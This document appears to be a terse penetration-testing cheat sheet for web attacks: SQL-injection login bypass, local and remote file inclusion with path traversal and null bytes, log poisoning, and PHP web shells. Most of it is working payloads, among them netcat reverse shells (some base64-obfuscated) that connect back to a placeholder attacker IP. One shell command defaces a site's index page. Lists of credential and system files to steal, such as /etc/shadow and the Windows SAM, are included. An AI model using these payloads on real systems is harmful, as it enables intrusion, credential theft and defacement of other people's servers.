Search for port 80 or any port running web server

If login page, bypass using sql injection, then hunt for LFI in pages

http://vulnerable_host/preview.php?file=../../../../etc/passwd 

==================== 
Useful shells:

<? system('uname -a');?>  
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

shell.php?e=whoami
shell.php?e=pwd
shell.php?e=uname%20-a (I had to URL encode the spaces otherwise my browser thought it should search using google)
shell.php?e=echo%20This%20site%20has%20been%20hacked%3Eindex.html
shell?e=ls%20-l%20/tmp

Null Byte Techniques
vuln.php?page=/etc/passwd 
vuln.php?page=/etc/passwd%2500  
http://vulnerable_host/preview.php?file=../../../../etc/passwd%00
http://vulnerable_host/preview.php?file=../../../../etc/passwd%00jpg
==========================

in documents folder, a python file is created to look for important windows files.

passthru("nc -e /bin/sh <attackerip> <attackerport>");
<?passthru("nc -e /bin/sh <attackerip> <attackerport>");?>
<?passthru(base64_decode("#base64 encoded command > nc -e /bin/sh <attackerip> <attackerport>"));?>
ssh "<?passthru(base64_decode("#base64 encoded command > nc -e /bin/sh <attackerip> <attackerport>"));?>


method1 = run php code through useragent header via burpsuite.
method2 = add a php code in the log files, /var/log/auth.log or mail log and send the php code through a bad ssh request ,using username as placeholder for php code. or through mail logs by sending an email.

/proc/self/environ%00
#This will read the useragent data for shell.
/etc/passwd
#users on the systems info

/windows/win.ini



Linux file locations:
– /etc/issue
– /proc/version
– /etc/profile
– /etc/passwd
– /etc/passwd
– /etc/shadow
– /root/.bash_history
– /var/log/dmessage
– /var/mail/root
– /var/spool/cron/crontabs/root


Windows File Locations:

– %SYSTEMROOT%repairsystem
– %SYSTEMROOT%repairSAM
– %SYSTEMROOT%repairSAM
– %WINDIR%win.ini
– %SYSTEMDRIVE%boot.ini
– %WINDIR%Panthersysprep.inf
– %WINDIR%system32configAppEvent.Evt
[/vc_tta_section]

OS/X macOS File Locations:

– /etc/fstab
– /etc/master.passwd
– /etc/resolv.conf
– /etc/sudoers
– /etc/sysctl.conf

---------------------------------------------------------------
----------------------------------------------------------------
Remote File Inclusion:

make a .txt file
<?php
passthru("nc -e /bin/sh attackerip attackerport");
?>
make the file accessible to victim
in victim machine type:
?page=http://attackerip/reverse.txt?
//question mark make it run on victim as php.




